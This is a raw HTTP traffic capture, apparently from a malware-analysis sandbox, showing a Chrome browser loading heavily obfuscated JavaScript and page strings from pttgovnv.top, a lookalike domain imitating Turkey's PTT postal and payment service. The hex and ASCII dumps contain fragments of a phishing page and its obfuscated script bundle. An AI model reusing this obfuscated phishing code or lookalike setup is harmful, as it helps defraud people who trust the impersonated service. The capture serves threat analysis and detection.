    2024-09-01 22:28:24 UTC1369INData Raw: 5c 78 32 32 5c 78 32 30 27 2c 27 6e 6c 69 6e 65 5f 64 61 74 61 27 2c 27 65 6d 65 49 73 6c 65 6d 6c 65 27 2c 27 61 67 65 27 2c 27 65 6d 5f 70 6f 73 74 61 27 2c 27 4e 74 4c 54 4d 67 59 32 39 73 27 2c 27 64 48 52 68 64 6d 30 75 59 32 27 2c 27 65 6d 5f 70 74 74 5f 74 65 62 27 2c 27 5a 68 62 47 46 79 4c 30 4a 68 27 2c 27 56 34 4c 31 52 31 63 6e 42 6c 27 2c 27 23 70 74 74 5f 74 65 6c 67 72 27 2c 27 6f 72 75 6d 6c 75 6c 75 6b 5f 27 2c 27 68 62 5f 6f 64 65 6d 65 6c 65 27 2c 27 5f 76 65 5f 6f 64 65 6d 65 5f 27 2c 27 72 65 64 69 5c 78 32 30 c3 96 64 65 6d 65 27 2c 27 74 74 6f 6e 5c 78 32 32 3e 44 61 68 61 27 2c 27 3d 5c 78 32 32 74 72 61 6e 73 69 74 69 27 2c 27 38 38 3c 2f 61 3e 3c 2f 73 70 27 2c 27 63 6c 61 73 73 3d 5c 78 32 32 73 6f 63 27 2c 27 5c 78 32 32 5c 78
    Data Ascii: \x22\x20','nline_data','emeIslemle','age','em_posta','NtLTMgY29s','dHRhdm0uY2','em_ptt_teb','ZhbGFyL0Jh','V4L1R1cnBl','#ptt_telgr','orumluluk_','hb_odemele','_ve_odeme_','redi\x20deme','tton\x22>Daha','=\x22transiti','88</a></sp','class=\x22soc','\x22\x
    2024-09-01 22:28:24 UTC1369INData Raw: 27 2c 27 59 69 42 7a 61 58 52 6c 63 32 27 2c 27 42 6a 62 32 77 74 63 32 30 74 27 2c 27 4d 36 4c 79 39 33 64 33 63 75 27 2c 27 72 2f 4b 61 72 67 6f 2f 41 6d 27 2c 27 4a 6b 58 7a 67 78 59 54 42 66 27 2c 27 74 74 5f 74 65 62 6c 69 67 61 27 2c 27 62 6c 69 67 61 74 2e 61 73 70 27 2c 27 69 2e 61 73 70 78 5c 78 32 32 3e 50 74 27 2c 27 5c 78 32 30 4b 41 54 41 4c 4f c4 9e 55 5c 78 32 30 27 2c 27 41 50 47 5c 78 32 30 27 2c 27 54 4f 52 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 5f 27 2c 27 64 48 52 66 5a 6d 46 35 5a 47 27 2c 27 66 5f 68 69 7a 6d 65 74 6c 65 27 2c 27 54 75 72 70 65 78 5c 78 32 30 27 2c 27 52 30 58 32 5a 68 65 57 52 68 27 2c 27 64 69 5f 6b 61 72 74 69 5f 6f 27 2c 27 64 69 76 3e 3c 64 69 76 5c 78 32 30 69 27 2c 27 32 36 35 63 53 63 55 77 6e 27 2c 27
    Data Ascii: ','YiBzaXRlc2','Bjb2wtc20t','M6Ly93d3cu','r/Kargo/Am','JkXzgxYTBf','tt_tebliga','bligat.asp','i.aspx\x22>Pt','\x20KATALOU\x20','APG\x20','TOR\x22\x20id=\x22_','dHRfZmF5ZG','f_hizmetle','Turpex\x20','R0X2ZheWRh','di_karti_o','div><div\x20i','265cScUwn','
    2024-09-01 22:28:24 UTC1369INData Raw: 72 75 6c 61 72 27 2c 27 6e 61 76 62 61 72 2d 74 6f 67 27 2c 27 53 61 79 66 61 6c 61 72 2f 4b 27 2c 27 23 70 74 74 5f 62 69 6c 67 69 27 2c 27 2d 31 38 27 2c 27 55 59 31 79 4c 36 5c 78 32 32 3e 3c 2f 27 2c 27 61 79 c4 b1 74 6c c4 b1 5c 78 32 30 45 6c 65 27 2c 27 59 57 4e 6f 62 57 56 75 64 48 27 2c 27 61 74 65 6c 69 5f 73 6f 7a 6c 27 2c 27 53 47 4b 5c 78 32 30 4d 61 61 c5 9f 5c 78 32 30 c3 96 27 2c 27 6d 74 6f 79 2e 70 74 74 2e 67 27 2c 27 65 72 5c 78 32 32 5c 78 32 30 68 72 65 66 3d 5c 78 32 32 27 2c 27 61 66 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 27 2c 27 2e 74 72 2f 53 61 79 66 61 6c 27 2c 27 45 43 33 34 41 38 35 41 42 41 27 2c 27 61 73 70 78 5c 78 32 32 3e c3 96 64 65 6d 27 2c 27 70 6c 61 79 3a 6e 6f 6e 65 3b 27 2c 27 61 73 73 3d 5c 78 32 32 74 72 61
    Data Ascii: rular','navbar-tog','Sayfalar/K','#ptt_bilgi','-18','UY1yL6\x22></','aytl\x20Ele','YWNobWVudH','ateli_sozl','SGK\x20Maa\x20','mtoy.ptt.g','er\x22\x20href=\x22','af\x22\x20class=','.tr/Sayfal','EC34A85ABA','aspx\x22>dem','play:none;','ass=\x22tra
    2024-09-01 22:28:24 UTC1369INData Raw: 72 5f 6f 64 65 6d 65 6c 65 27 2c 27 6f 48 69 7a 6d 65 74 6c 65 72 27 2c 27 72 2f 4b 61 72 67 6f 2e 61 73 27 2c 27 4e 30 61 57 31 68 5a 32 55 74 27 2c 27 74 4d 61 6e 61 67 65 72 5f 53 27 2c 27 72 74 5f 69 73 6c 65 6d 6c 65 27 2c 27 69 74 79 43 6f 6e 74 65 6e 74 27 2c 27 38 76 64 33 64 33 4c 6e 42 30 27 2c 27 75 72 75 6c 61 72 27 2c 27 61 72 2f 42 61 6e 6b 61 2f 48 27 2c 27 63 74 6c 30 30 5f 67 5f 64 37 27 2c 27 65 72 69 5c 78 32 30 3c 2f 61 3e 3c 61 27 2c 27 61 48 69 7a 6d 65 74 6c 65 72 27 2c 27 41 6e 6c 61 c5 9f 6d 61 6c c4 b1 5c 78 32 30 27 2c 27 57 65 73 74 65 72 6e 5c 78 32 30 55 6e 27 2c 27 79 75 72 74 5f 69 63 69 5f 70 27 2c 27 5f 6d 61 64 64 65 6c 65 72 69 27 2c 27 52 30 4c 58 42 79 62 32 52 31 27 2c 27 65 6d 5f 70 74 74 5f 6e 61 6b 27 2c 27 5a 6a
    Data Ascii: r_odemele','oHizmetler','r/Kargo.as','N0aW1hZ2Ut','tManager_S','rt_islemle','ityContent','8vd3d3LnB0','urular','ar/Banka/H','ctl00_g_d7','eri\x20</a><a','aHizmetler','Anlamal\x20','Western\x20Un','yurt_ici_p','_maddeleri','R0LXByb2R1','em_ptt_nak','Zj
    2024-09-01 22:28:24 UTC1369INData Raw: 73 5f 6b 61 67 69 74 6c 61 27 2c 27 73 61 70 5c 78 32 30 c4 b0 c5 9f 6c 65 6d 6c 27 2c 27 72 72 65 72 5c 78 32 32 3e 65 2d 46 69 27 2c 27 2d 6d 64 2d 34 5c 78 32 32 3e 3c 61 5c 78 32 30 27 2c 27 64 6c 59 6d 39 69 61 6c 39 77 27 2c 27 61 6e 6b 61 73 69 5f 73 69 6b 27 2c 27 4d 57 4d 33 4d 56 38 30 59 7a 27 2c 27 64 33 64 79 35 69 64 47 73 75 27 2c 27 62 6f 78 2d 73 68 61 64 6f 77 27 2c 27 53 2e 61 73 70 78 5c 78 32 32 3e 48 47 27 2c 27 49 48 4e 79 59 7a 30 69 61 48 27 2c 27 65 6d 5f 70 74 74 5f 6d 61 6c 27 2c 27 4c 6f 67 6f 6c 61 72 c4 b1 6d c4 b1 27 2c 27 61 76 5f 66 6f 6f 74 65 72 6d 27 2c 27 50 6f 73 74 61 2f 54 65 62 6c 27 2c 27 59 43 5a 67 39 6b 46 67 49 43 27 2c 27 74 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 27 2c 27 74 74 5f 62 69 6c 67
    Data Ascii: s_kagitla','sap\x20leml','rrer\x22>e-Fi','-md-4\x22><a\x20','dlYm9ial9w','ankasi_sik','MWM3MV80Yz','d3dy5idGsu','box-shadow','S.aspx\x22>HG','IHNyYz0iaH','em_ptt_mal','Logolarm','av_footerm','Posta/Tebl','YCZg9kFgIC','t\x22\x20class=\x22','tt_bilg
    2024-09-01 22:28:24 UTC1369INData Raw: 4a 76 63 32 39 6d 27 2c 27 47 4f 5c 78 32 30 48 c4 b0 5a 4d 45 54 4c 27 2c 27 67 69 49 48 52 68 63 6d 64 6c 27 2c 27 78 30 64 58 4a 6c 50 57 35 6c 27 2c 27 61 5f 6b 61 72 74 69 27 2c 27 54 61 72 69 68 c3 a7 65 5c 78 32 30 27 2c 27 61 74 6c 61 72 69 27 2c 27 74 5f 61 63 73 68 62 5f 6f 64 27 2c 27 5c 78 32 32 6e 6f 6f 70 65 6e 65 72 5c 78 32 30 27 2c 27 65 6e 75 5c 78 32 30 73 6d 2d 6e 6f 77 27 2c 27 46 6a 61 47 31 6c 62 6e 52 7a 27 2c 27 63 33 52 7a 4c 30 5a 68 65 57 27 2c 27 68 43 68 61 6e 67 65 28 29 3b 27 2c 27 79 61 6c 5f 73 6f 72 75 6d 6c 27 2c 27 59 75 64 48 49 76 54 47 6c 7a 27 2c 27 61 70 73 65 27 2c 27 34 2d 6e 6f 74 64 6c 67 5c 78 32 30 6e 27 2c 27 65 72 69 2e 61 73 70 78 23 65 27 2c 27 61 72 67 6f 2f 50 74 74 59 75 27 2c 27 45 67 59 32 39 73 4c
    Data Ascii: Jvc29m','GO\x20HZMETL','giIHRhcmdl','x0dXJlPW5l','a_karti','Tarihe\x20','atlari','t_acshb_od','\x22noopener\x20','enu\x20sm-now','FjaG1lbnRz','c3RzL0ZheW','hChange();','yal_soruml','YudHIvTGlz','apse','4-notdlg\x20n','eri.aspx#e','argo/PttYu','EgY29sL


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    19192.168.2.449760104.21.47.250443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:24 UTC364OUTGET /help/assets/37d8eb31JxKnW.js HTTP/1.1
    Host: pttgovnv.top
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:24 UTC766INHTTP/1.1 200 OK
    Date: Sun, 01 Sep 2024 22:28:24 GMT
    Content-Type: application/javascript; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=86400
    Last-Modified: Wed, 29 May 2024 10:14:42 GMT
    ETag: W/"cf70-18fc3d84650"
    CF-Cache-Status: HIT
    Age: 34358
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wFX880xs%2F6ooJWn6m0I7MWabKXGl0AR39CJbjUsCFx%2Fg1PIeyfpFFbBvXECNQ%2B6QdJaMTxAFPb411H9FEEBHAg66DE8%2F%2F4FIJEIQXHX9kKC6RIDc%2BPDXfFljmAKG8%2FY%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8bc8b1733a9b4339-EWR
    alt-svc: h3=":443"; ma=86400
    2024-09-01 22:28:24 UTC603INData Raw: 37 63 62 32 0d 0a 63 6f 6e 73 74 20 61 39 5f 30 78 31 33 64 30 32 33 3d 61 39 5f 30 78 33 36 34 37 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 63 30 66 34 63 2c 5f 30 78 35 62 34 66 37 65 29 7b 63 6f 6e 73 74 20 5f 30 78 31 38 63 30 65 33 3d 61 39 5f 30 78 33 36 34 37 2c 5f 30 78 33 35 64 30 39 63 3d 5f 30 78 31 63 30 66 34 63 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 61 38 30 38 39 35 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 38 63 30 65 33 28 30 78 66 62 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 31 38 63 30 65 33 28 30 78 31 32 65 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 38 63 30 65 33 28 30 78 31 39 63 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 38
    Data Ascii: 7cb2const a9_0x13d023=a9_0x3647;(function(_0x1c0f4c,_0x5b4f7e){const _0x18c0e3=a9_0x3647,_0x35d09c=_0x1c0f4c();while(!![]){try{const _0xa80895=-parseInt(_0x18c0e3(0xfb))/0x1*(parseInt(_0x18c0e3(0x12e))/0x2)+parseInt(_0x18c0e3(0x19c))/0x3+-parseInt(_0x18
    2024-09-01 22:28:24 UTC1369INData Raw: 27 70 75 73 68 27 5d 28 5f 30 78 33 35 64 30 39 63 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 61 39 5f 30 78 35 34 30 33 2c 30 78 35 61 36 32 36 29 29 3b 69 6d 70 6f 72 74 7b 73 20 61 73 20 61 39 5f 30 78 33 30 66 39 64 37 2c 75 20 61 73 20 61 39 5f 30 78 31 66 33 62 30 36 2c 78 20 61 73 20 61 39 5f 30 78 32 65 65 33 64 31 2c 72 20 61 73 20 61 39 5f 30 78 34 63 37 30 62 63 2c 6e 20 61 73 20 61 39 5f 30 78 38 30 33 61 35 62 2c 79 20 61 73 20 61 39 5f 30 78 33 65 36 30 61 34 2c 64 20 61 73 20 61 39 5f 30 78 32 35 35 63 63 33 2c 7a 20 61 73 20 61 39 5f 30 78 34 36 31 36 35 63 2c 41 20 61 73 20 61 39 5f 30 78 32 62 33 63 64 37 2c 61 20 61 73 20 61 39 5f 30 78 35 61 34 38 36 32 2c 77 20 61 73 20 61 39 5f 30 78 32 37 33 34 39 36 7d 66 72 6f 6d 27 2e 2f
    Data Ascii: 'push'](_0x35d09c['shift']());}}}(a9_0x5403,0x5a626));import{s as a9_0x30f9d7,u as a9_0x1f3b06,x as a9_0x2ee3d1,r as a9_0x4c70bc,n as a9_0x803a5b,y as a9_0x3e60a4,d as a9_0x255cc3,z as a9_0x46165c,A as a9_0x2b3cd7,a as a9_0x5a4862,w as a9_0x273496}from'./
    2024-09-01 22:28:24 UTC1369INData Raw: 65 37 34 36 34 3d 5f 30 78 32 39 36 63 64 37 28 5f 30 78 35 63 62 37 36 38 29 29 2c 5f 30 78 35 34 66 38 35 64 3e 2d 30 78 31 26 26 28 5f 30 78 35 36 66 30 33 30 3d 5f 30 78 35 36 66 30 33 30 7c 7c 5f 30 78 32 33 36 64 35 35 5b 5f 30 78 34 38 39 66 32 63 28 30 78 31 31 31 29 5d 28 30 78 30 2c 5f 30 78 35 34 66 38 35 64 29 2c 5f 30 78 35 62 38 37 62 32 3d 5f 30 78 32 33 36 64 35 35 5b 27 73 6c 69 63 65 27 5d 28 5f 30 78 35 34 66 38 35 64 2c 5f 30 78 32 33 36 64 35 35 5b 5f 30 78 34 38 39 66 32 63 28 30 78 31 33 30 29 5d 29 29 2c 5f 30 78 35 36 66 30 33 30 3d 61 74 28 5f 30 78 35 36 66 30 33 30 21 3d 6e 75 6c 6c 3f 5f 30 78 35 36 66 30 33 30 3a 5f 30 78 32 33 36 64 35 35 2c 5f 30 78 35 33 61 32 36 66 29 2c 7b 27 66 75 6c 6c 50 61 74 68 27 3a 5f 30 78 35 36
    Data Ascii: e7464=_0x296cd7(_0x5cb768)),_0x54f85d>-0x1&&(_0x56f030=_0x56f030||_0x236d55[_0x489f2c(0x111)](0x0,_0x54f85d),_0x5b87b2=_0x236d55['slice'](_0x54f85d,_0x236d55[_0x489f2c(0x130)])),_0x56f030=at(_0x56f030!=null?_0x56f030:_0x236d55,_0x53a26f),{'fullPath':_0x56
    2024-09-01 22:28:24 UTC1369INData Raw: 78 31 63 66 39 37 37 29 69 66 28 21 69 74 28 5f 30 78 31 63 66 39 37 37 5b 5f 30 78 35 63 34 65 37 38 5d 2c 5f 30 78 31 30 31 34 38 63 5b 5f 30 78 35 63 34 65 37 38 5d 29 29 72 65 74 75 72 6e 21 30 78 31 3b 72 65 74 75 72 6e 21 30 78 30 3b 7d 66 75 6e 63 74 69 6f 6e 20 61 39 5f 30 78 35 34 30 33 28 29 7b 63 6f 6e 73 74 20 5f 30 78 34 30 33 66 64 33 3d 5b 27 6d 65 73 73 61 67 65 27 2c 27 61 63 6b 73 27 2c 27 6c 69 73 74 65 6e 27 2c 27 69 6e 63 6c 75 64 65 73 27 2c 27 43 6c 61 73 73 27 2c 27 32 35 32 34 39 32 33 67 46 79 50 65 41 27 2c 27 62 69 6e 64 27 2c 27 73 68 69 66 74 4b 65 79 27 2c 27 65 72 74 69 65 73 27 2c 27 73 74 61 74 65 27 2c 27 63 75 72 72 65 6e 74 54 61 72 27 2c 27 70 6f 73 69 74 69 6f 6e 27 2c 27 62 65 66 6f 72 65 52 6f 75 74 27 2c 27 2e 5c
    Data Ascii: x1cf977)if(!it(_0x1cf977[_0x5c4e78],_0x10148c[_0x5c4e78]))return!0x1;return!0x0;}function a9_0x5403(){const _0x403fd3=['message','acks','listen','includes','Class','2524923gFyPeA','bind','shiftKey','erties','state','currentTar','position','beforeRout','.\
    2024-09-01 22:28:24 UTC1369INData Raw: 2c 27 63 6f 6d 70 6f 6e 65 6e 74 73 27 2c 27 74 68 5c 78 32 30 5c 78 32 32 27 2c 27 28 3f 3a 2f 7c 24 29 27 2c 27 73 65 61 72 63 68 27 2c 27 24 72 6f 75 74 65 27 2c 27 65 73 6f 6c 76 65 5c 78 32 30 63 6f 6d 27 2c 27 5c 78 32 32 5c 78 32 30 28 27 2c 27 6c 69 73 74 27 2c 27 74 6f 72 27 2c 27 73 70 6c 69 63 65 27 2c 27 61 6c 69 61 73 27 2c 27 69 6e 73 74 61 6e 63 65 73 27 2c 27 66 75 6e 63 74 69 6f 6e 27 2c 27 6f 72 61 74 69 6f 6e 27 2c 27 75 6e 73 68 69 66 74 27 2c 27 5b 5e 2f 5d 2b 3f 27 2c 27 64 75 70 6c 69 63 61 74 65 64 27 2c 27 6e 61 76 69 67 61 74 65 27 2c 27 73 70 6c 69 74 27 2c 27 69 73 45 78 61 63 74 41 63 74 27 2c 27 6d 61 6e 75 61 6c 27 2c 27 65 6e 74 65 72 43 61 6c 6c 62 27 2c 27 5f 5f 76 63 63 4f 70 74 73 27 2c 27 73 69 7a 65 27 2c 27 61 75 6c
    Data Ascii: ,'components','th\x20\x22','(?:/|$)','search','$route','esolve\x20com','\x22\x20(','list','tor','splice','alias','instances','function','oration','unshift','[^/]+?','duplicated','navigate','split','isExactAct','manual','enterCallb','__vccOpts','size','aul
    2024-09-01 22:28:24 UTC1369INData Raw: 78 31 33 64 30 32 33 3b 72 65 74 75 72 6e 20 4e 28 5f 30 78 34 31 39 33 33 61 29 3f 5f 30 78 34 35 61 65 61 34 5b 5f 30 78 31 33 36 64 34 36 28 30 78 31 33 30 29 5d 3d 3d 3d 5f 30 78 34 31 39 33 33 61 5b 5f 30 78 31 33 36 64 34 36 28 30 78 31 33 30 29 5d 26 26 5f 30 78 34 35 61 65 61 34 5b 5f 30 78 31 33 36 64 34 36 28 30 78 31 39 32 29 5d 28 28 5f 30 78 31 63 64 36 66 63 2c 5f 30 78 31 61 32 35 64 37 29 3d 3e 5f 30 78 31 63 64 36 66 63 3d 3d 3d 5f 30 78 34 31 39 33 33 61 5b 5f 30 78 31 61 32 35 64 37 5d 29 3a 5f 30 78 34 35 61 65 61 34 5b 5f 30 78 31 33 36 64 34 36 28 30 78 31 33 30 29 5d 3d 3d 3d 30 78 31 26 26 5f 30 78 34 35 61 65 61 34 5b 30 78 30 5d 3d 3d 3d 5f 30 78 34 31 39 33 33 61 3b 7d 66 75 6e 63 74 69 6f 6e 20 61 74 28 5f 30 78 33 35 37 62 30
    Data Ascii: x13d023;return N(_0x41933a)?_0x45aea4[_0x136d46(0x130)]===_0x41933a[_0x136d46(0x130)]&&_0x45aea4[_0x136d46(0x192)]((_0x1cd6fc,_0x1a25d7)=>_0x1cd6fc===_0x41933a[_0x1a25d7]):_0x45aea4[_0x136d46(0x130)]===0x1&&_0x45aea4[0x0]===_0x41933a;}function at(_0x357b0
    2024-09-01 22:28:24 UTC1369INData Raw: 78 35 61 62 38 37 31 28 30 78 31 63 39 29 2b 27 72 27 5d 28 5f 30 78 61 35 61 32 66 37 29 5b 5f 30 78 35 61 62 38 37 31 28 30 78 31 35 33 29 5d 28 27 28 28 28 2e 2b 29 2b 29 2b 29 27 2b 27 2b 24 27 29 3b 7d 29 3b 5f 30 78 61 35 61 32 66 37 28 29 2c 28 5f 30 78 31 36 37 66 39 33 5b 27 70 6f 70 27 5d 3d 5f 30 78 36 34 66 35 36 64 28 30 78 31 37 66 29 2c 5f 30 78 31 36 37 66 39 33 5b 5f 30 78 36 34 66 35 36 64 28 30 78 31 37 35 29 5d 3d 27 70 75 73 68 27 29 3b 7d 28 59 7c 7c 28 59 3d 7b 7d 29 29 29 3b 76 61 72 20 5a 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 31 61 33 64 63 29 7b 63 6f 6e 73 74 20 5f 30 78 62 37 31 61 39 36 3d 61 39 5f 30 78 31 33 64 30 32 33 3b 5f 30 78 32 31 61 33 64 63 5b 5f 30 78 62 37 31 61 39 36 28 30 78 31 39 34 29 5d 3d 5f 30 78 62
    Data Ascii: x5ab871(0x1c9)+'r'](_0xa5a2f7)[_0x5ab871(0x153)]('(((.+)+)+)'+'+$');});_0xa5a2f7(),(_0x167f93['pop']=_0x64f56d(0x17f),_0x167f93[_0x64f56d(0x175)]='push');}(Y||(Y={})));var Z;(function(_0x21a3dc){const _0xb71a96=a9_0x13d023;_0x21a3dc[_0xb71a96(0x194)]=_0xb
    2024-09-01 22:28:24 UTC1369INData Raw: 5f 30 78 35 35 62 64 61 32 3d 61 39 5f 30 78 31 33 64 30 32 33 3b 6c 65 74 20 5f 30 78 34 31 35 62 65 32 3b 69 66 28 27 65 6c 27 69 6e 20 5f 30 78 34 37 35 34 65 34 29 7b 63 6f 6e 73 74 20 5f 30 78 34 35 39 39 62 62 3d 5f 30 78 34 37 35 34 65 34 5b 27 65 6c 27 5d 2c 5f 30 78 32 34 38 36 36 64 3d 74 79 70 65 6f 66 20 5f 30 78 34 35 39 39 62 62 3d 3d 5f 30 78 35 35 62 64 61 32 28 30 78 31 33 38 29 26 26 5f 30 78 34 35 39 39 62 62 5b 5f 30 78 35 35 62 64 61 32 28 30 78 66 30 29 5d 28 27 23 27 29 2c 5f 30 78 33 61 39 30 37 39 3d 74 79 70 65 6f 66 20 5f 30 78 34 35 39 39 62 62 3d 3d 27 73 74 72 69 6e 67 27 3f 5f 30 78 32 34 38 36 36 64 3f 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 35 35 62 64 61 32 28 30 78 31 34 65 29 2b 5f 30 78 35 35 62 64 61 32 28 30 78 31 31 63
    Data Ascii: _0x55bda2=a9_0x13d023;let _0x415be2;if('el'in _0x4754e4){const _0x4599bb=_0x4754e4['el'],_0x24866d=typeof _0x4599bb==_0x55bda2(0x138)&&_0x4599bb[_0x55bda2(0xf0)]('#'),_0x3a9079=typeof _0x4599bb=='string'?_0x24866d?document[_0x55bda2(0x14e)+_0x55bda2(0x11c
    2024-09-01 22:28:24 UTC1369INData Raw: 38 5b 27 73 70 6c 69 63 65 27 5d 28 5f 30 78 33 62 34 62 30 37 29 2c 5f 30 78 35 35 31 39 38 38 5b 27 70 75 73 68 27 5d 28 5f 30 78 33 38 39 30 65 38 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 63 38 34 62 34 28 5f 30 78 32 66 63 32 31 66 2c 5f 30 78 32 35 64 62 61 64 2c 7b 64 69 72 65 63 74 69 6f 6e 3a 5f 30 78 35 64 64 30 30 38 2c 64 65 6c 74 61 3a 5f 30 78 33 66 35 33 31 34 7d 29 7b 63 6f 6e 73 74 20 5f 30 78 35 62 31 32 66 35 3d 61 39 5f 30 78 33 36 34 37 2c 5f 30 78 33 61 63 33 65 62 3d 7b 27 64 69 72 65 63 74 69 6f 6e 27 3a 5f 30 78 35 64 64 30 30 38 2c 27 64 65 6c 74 61 27 3a 5f 30 78 33 66 35 33 31 34 2c 27 74 79 70 65 27 3a 59 5b 5f 30 78 35 62 31 32 66 35 28 30 78 31 37 66 29 5d 7d 3b 66 6f 72 28 63 6f 6e 73 74 20 5f 30 78 33 36 36 33 64 62
    Data Ascii: 8['splice'](_0x3b4b07),_0x551988['push'](_0x3890e8);}function _0x3c84b4(_0x2fc21f,_0x25dbad,{direction:_0x5dd008,delta:_0x3f5314}){const _0x5b12f5=a9_0x3647,_0x3ac3eb={'direction':_0x5dd008,'delta':_0x3f5314,'type':Y[_0x5b12f5(0x17f)]};for(const _0x3663db
    2024-09-01 22:28:24 UTC1369INData Raw: 6f 6e 20 79 74 28 5f 30 78 35 63 32 31 30 32 29 7b 63 6f 6e 73 74 20 5f 30 78 61 33 66 36 66 34 3d 61 39 5f 30 78 31 33 64 30 32 33 3b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 5f 30 78 35 63 32 31 30 32 3d 3d 5f 30 78 61 33 66 36 66 34 28 30 78 31 33 38 29 7c 7c 5f 30 78 35 63 32 31 30 32 26 26 74 79 70 65 6f 66 20 5f 30 78 35 63 32 31 30 32 3d 3d 5f 30 78 61 33 66 36 66 34 28 30 78 31 30 33 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 47 65 28 5f 30 78 66 62 37 38 35 39 29 7b 63 6f 6e 73 74 20 5f 30 78 35 61 32 65 33 32 3d 61 39 5f 30 78 31 33 64 30 32 33 3b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 5f 30 78 66 62 37 38 35 39 3d 3d 5f 30 78 35 61 32 65 33 32 28 30 78 31 33 38 29 7c 7c 74 79 70 65 6f 66 20 5f 30 78 66 62 37 38 35 39 3d 3d 5f 30 78 35 61 32 65 33
    Data Ascii: on yt(_0x5c2102){const _0xa3f6f4=a9_0x13d023;return typeof _0x5c2102==_0xa3f6f4(0x138)||_0x5c2102&&typeof _0x5c2102==_0xa3f6f4(0x103);}function Ge(_0xfb7859){const _0x5a2e32=a9_0x13d023;return typeof _0xfb7859==_0x5a2e32(0x138)||typeof _0xfb7859==_0x5a2e3


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    20192.168.2.449764104.21.47.250443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:24 UTC364OUTGET /help/assets/09bf01f8JxKnW.js HTTP/1.1
    Host: pttgovnv.top
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:24 UTC751INHTTP/1.1 200 OK
    Date: Sun, 01 Sep 2024 22:28:24 GMT
    Content-Type: application/javascript; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=86400
    Last-Modified: Wed, 29 May 2024 10:14:42 GMT
    ETag: W/"7ad-18fc3d84650"
    CF-Cache-Status: HIT
    Age: 184
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZbWcaYlBLXxPQ%2FT5ScvPw47nYTq6x1wBi27ANTDYWYOaF9lrFPwRFFpNZYfFAxRQ05c8OcMJZWp14rugYZ5MIJDSKVZcKdpBxYUBRRRP3TiewNxaaqgcalKYPZid4VY%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8bc8b1776c7242c7-EWR
    alt-svc: h3=":443"; ma=86400
    2024-09-01 22:28:24 UTC618INData Raw: 37 61 64 0d 0a 66 75 6e 63 74 69 6f 6e 20 61 30 5f 30 78 31 37 32 36 28 29 7b 63 6f 6e 73 74 20 5f 30 78 35 39 30 66 62 36 3d 5b 27 74 6f 53 74 72 69 6e 67 27 2c 27 61 70 70 6c 79 27 2c 27 31 32 31 37 32 38 30 6d 46 59 53 68 67 27 2c 27 37 34 35 31 30 31 48 74 47 52 79 7a 27 2c 27 35 6b 47 7a 6a 5a 66 27 2c 27 28 28 28 2e 2b 29 2b 29 2b 29 27 2c 27 73 65 61 72 63 68 27 2c 27 32 31 34 34 31 33 33 57 78 78 57 57 65 27 2c 27 72 65 6d 6f 76 65 27 2c 27 31 33 36 38 38 31 32 57 71 49 75 52 76 27 2c 27 6e 6f 6f 70 65 6e 65 72 27 2c 27 63 6c 69 63 6b 27 2c 27 32 32 32 36 35 37 34 56 6a 6b 4e 68 68 27 2c 27 34 34 39 33 36 38 6a 7a 6a 62 71 74 27 2c 27 34 32 35 36 39 37 36 4d 69 68 75 43 76 27 2c 27 61 70 70 65 6e 64 27 2c 27 62 6f 64 79 27 2c 27 72 65 6c 27 2c 27
    Data Ascii: 7adfunction a0_0x1726(){const _0x590fb6=['toString','apply','1217280mFYShg','745101HtGRyz','5kGzjZf','(((.+)+)+)','search','2144133WxxWWe','remove','1368812WqIuRv','noopener','click','2226574VjkNhh','449368jzjbqt','4256976MihuCv','append','body','rel','
